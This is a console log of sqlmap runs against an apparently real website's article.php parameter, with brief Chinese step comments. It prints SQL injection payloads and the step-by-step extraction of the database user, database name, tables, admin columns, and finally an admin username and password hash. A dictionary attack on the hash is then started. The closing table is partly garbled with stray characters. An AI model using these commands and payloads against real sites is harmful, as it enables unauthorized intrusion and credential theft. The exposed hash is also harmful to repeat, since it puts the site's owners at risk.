D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-user /* 注解:获取当前用户名称
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:53:58
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-db /*当前数据库
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
ssion': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack o
n retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
9 j( {0 R8 ^+ e z" [Table: admin. ^, `2 S4 k) L- L2 m7 ^/ w
[1 entry]# j9 u: X% W+ r/ `: C, C+ {
+----------------------------------+------------+
/ @# s* L; Y, M, W+ Y| password | userid |
/ O9 m+ \8 U9 r2 L( H. t8 c1 ~+----------------------------------+------------+
+ h$ G3 ^6 @- E3 u# \| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
6 ^2 H5 u& d5 s7 q0 V. t4 _7 H3 W+----------------------------------+------------+; a8 J8 r" Z8 l
shutting down at: 16:58:14
D:\Python27\sqlmap> |